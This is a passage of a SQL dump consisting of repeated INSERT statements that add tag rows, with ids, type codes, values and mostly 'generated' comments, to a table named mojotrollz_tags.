`type`, `value`, `comment`) VALUES (5274, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5274, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5276, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5276, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5277, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5277, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5277, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5278, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5278, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5280, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5280, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5280, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5283, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5283, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5283, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5286, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5286, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5287, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5287, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5288, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5288, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5291, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5291, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5291, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5292, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5292, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5293, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5293, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5295, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5295, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5296, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5296, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5297, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5297, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5299, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5299, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5300, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5300, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5304, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5304, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5305, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5305, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5306, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5306, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5307, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5307, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5308, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5308, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5312, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5312, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5314, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5314, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5317, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5317, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5319, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5319, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5320, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5320, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5327, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5327, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5328, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5328, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5331, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5331, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5332, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5332, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5333, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5333, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5334, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5334, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5335, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5335, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5336, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5336, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5337, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5337, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5343, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5343, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5345, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5345, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5346, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5346, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5347, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5347, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5349, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5349, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5350, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5350, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5352, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5352, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5353, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5353, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5354, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5354, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5356, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5356, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5357, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5357, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5358, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5358, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5359, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5359, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5360, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5360, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5361, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5361, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5362, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5362, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5363, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5363, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5364, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5364, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5366, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5366, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5384, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5384, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5385, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5385, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5386, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5386, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5387, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5387, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5388, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5388, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5389, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5389, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5390, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5390, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5391, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5391, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5392, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5392, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5393, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5393, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5394, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5394, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5395, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5395, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5396, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5396, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5397, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5397, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5398, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5398, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5399, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5400, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5401, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5401, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5402, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5403, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5403, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5404, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5404, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5405, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5405, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5406, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5406, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5407, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5409, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5411, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5411, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5412, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5412, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5413, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5413, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5414, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5414, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5416, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5416, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5418, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5418, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5419, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5419, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5420, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5420, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5421, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5421, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5422, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5422, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5423, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5423, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5424, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5424, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5425, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5425, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5426, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5426, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5427, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5427, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5428, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5428, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5429, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5429, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5430, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5430, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5431, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5431, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5432, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5434, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5435, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5441, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5441, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5450, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5450, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5451, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5451, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5452, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5452, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5453, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5453, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5454, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5454, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5455, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5455, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5456, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5456, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5457, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5457, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5458, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5458, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5459, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5459, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5460, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5460, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5461, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5461, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5462, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5462, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5464, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5464, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5465, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5465, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5466, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5466, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5467, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5467, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5469, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5469, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, 